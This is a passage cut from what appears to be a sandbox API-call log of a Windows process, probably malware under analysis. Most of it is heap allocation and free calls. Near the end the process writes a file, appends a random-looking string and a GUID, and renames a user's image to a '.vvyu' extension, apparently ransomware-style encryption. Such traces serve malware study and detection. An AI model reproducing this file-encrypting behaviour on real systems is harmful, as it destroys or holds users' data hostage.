(HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0194.070] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39fe8 [0194.070] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0194.071] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39fd0 [0194.071] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0194.071] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x6d5c88 [0194.071] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0194.071] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0194.071] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0194.071] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0194.071] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0194.071] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0194.071] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0194.071] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39fe8 | out: hHeap=0x6a0000) returned 1 [0194.071] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0194.071] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39fd0 | out: hHeap=0x6a0000) returned 1 [0194.072] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0194.072] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0194.072] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a030 | out: hHeap=0x6a0000) returned 1 [0194.072] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0194.072] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0194.073] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0194.073] GetCurrentThreadId () returned 0x264 [0194.073] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0194.073] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d461b0 [0194.073] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0194.073] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eaa30 [0194.073] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0194.073] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0194.073] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0194.073] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0194.073] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0194.074] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0194.074] GetCurrentThreadId () returned 0x264 [0194.074] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0194.074] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0194.074] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2c31700 [0194.074] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0194.075] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0194.075] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0194.075] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0194.075] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0194.075] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0194.075] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0194.075] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a08 [0194.075] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0194.075] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0194.075] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0194.075] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a030 [0194.075] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0194.075] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0194.075] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0194.076] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0194.076] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0194.076] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0194.076] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0194.076] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0194.076] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39fd0 [0194.076] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0194.076] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0194.076] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0194.076] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0194.076] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0194.076] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0194.076] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0194.076] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39fe8 [0194.076] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0194.076] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0194.076] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0194.076] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39fb8 [0194.076] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0194.076] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a048 [0194.076] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0194.076] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0194.076] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0194.076] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a018 [0194.076] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0194.076] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a000 [0194.076] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0194.077] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a060 [0194.077] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a000 | out: hHeap=0x6a0000) returned 1 [0194.077] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a000 [0194.077] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a018 | out: hHeap=0x6a0000) returned 1 [0194.077] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0194.077] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0194.077] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0194.077] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0194.077] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27b58 [0194.077] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39fd0 | out: hHeap=0x6a0000) returned 1 [0194.077] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39fd0 [0194.077] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0194.077] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0194.077] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a030 | out: hHeap=0x6a0000) returned 1 [0194.077] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0194.077] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a060 | out: hHeap=0x6a0000) returned 1 [0194.077] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0194.077] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0194.077] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c03ca0 [0194.077] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0194.077] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0194.077] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39fd0 | out: hHeap=0x6a0000) returned 1 [0194.077] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0194.078] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0194.078] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0194.078] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0194.078] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eaa30 | out: hHeap=0x6a0000) returned 1 [0194.078] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0194.079] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0194.079] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0194.079] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0194.079] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0194.080] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0194.080] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0194.080] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0194.080] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a000 | out: hHeap=0x6a0000) returned 1 [0194.080] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0194.080] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a048 | out: hHeap=0x6a0000) returned 1 [0194.080] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0194.080] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39fe8 | out: hHeap=0x6a0000) returned 1 [0194.080] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39fb8 | out: hHeap=0x6a0000) returned 1 [0194.080] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0194.081] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0194.081] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0194.081] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39fa0 | out: hHeap=0x6a0000) returned 1 [0194.081] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d422f8 | out: hHeap=0x6a0000) returned 1 [0194.082] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0194.082] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0194.082] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a08 | out: hHeap=0x6a0000) returned 1 [0194.082] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0194.082] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0194.082] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0194.083] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0194.083] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0194.083] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0194.083] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0194.084] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0194.084] WriteFile (in: hFile=0x584, lpBuffer=0x2d49778*, nNumberOfBytesToWrite=0xb9a6, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d49778*, lpNumberOfBytesWritten=0x30ffb14*=0xb9a6, lpOverlapped=0x0) returned 1 [0194.084] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49778 | out: hHeap=0x6a0000) returned 1 [0194.084] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xb9ab, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.084] WriteFile (in: hFile=0x584, lpBuffer=0x6d5c88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x6d5c88*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0194.085] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0194.085] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c701a0 [0194.085] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0194.085] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0194.085] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0194.085] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0194.085] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c701a0 | out: hHeap=0x6a0000) returned 1 [0194.086] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0194.086] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0194.086] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0194.086] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0194.086] CloseHandle (hObject=0x584) returned 1 [0194.199] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eaa30 [0194.199] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x880) returned 0x2d154b0 [0194.200] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eaa30 | out: hHeap=0x6a0000) returned 1 [0194.200] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\Ths6OlVH\\AFh 4M.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\ths6olvh\\afh 4m.gif"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\Ths6OlVH\\AFh 4M.gif.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\ths6olvh\\afh 4m.gif.vvyu")) returned 1 [0194.202] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.202] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0194.202] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0194.205] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c2d920 | out: hHeap=0x6a0000) returned 1 [0194.205] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2fea190, ftCreationTime.dwHighDateTime=0x1d8a0de, ftLastAccessTime.dwLowDateTime=0x8e947c60, ftLastAccessTime.dwHighDateTime=0x1d8a567, ftLastWriteTime.dwLowDateTime=0x8e947c60, ftLastWriteTime.dwHighDateTime=0x1d8a567, nFileSizeHigh=0x0, nFileSizeLow=0xb9ab, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AFh 4M.gif", cAlternateFileName="AFH4M~1.GIF")) returned 0 [0194.205] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0194.206] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0194.206] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b730 | out: hHeap=0x6a0000) returned 1 [0194.206] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0194.206] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eaa30 [0194.206] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0194.206] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0194.206] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.207] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.207] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0194.207] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0194.207] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.207] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.207] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0194.208] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0194.208] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.208] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.208] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0194.208] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0194.208] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.209] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.209] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0194.209] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0194.209] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.209] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.210] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0194.210] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0194.210] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0194.210] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.210] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0194.210] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0194.211] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.211] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d3a670 [0194.211] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.211] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0194.211] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0194.212] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0194.212] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.212] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.212] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0194.212] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0194.212] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0194.213] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.213] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0194.213] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0194.213] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0194.213] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0194.214] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0194.214] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0194.214] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0194.214] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0194.215] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0194.215] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0194.215] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.215] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.216] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0194.216] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0194.216] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.216] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.217] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0194.217] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0194.217] RtlAllocateHeap 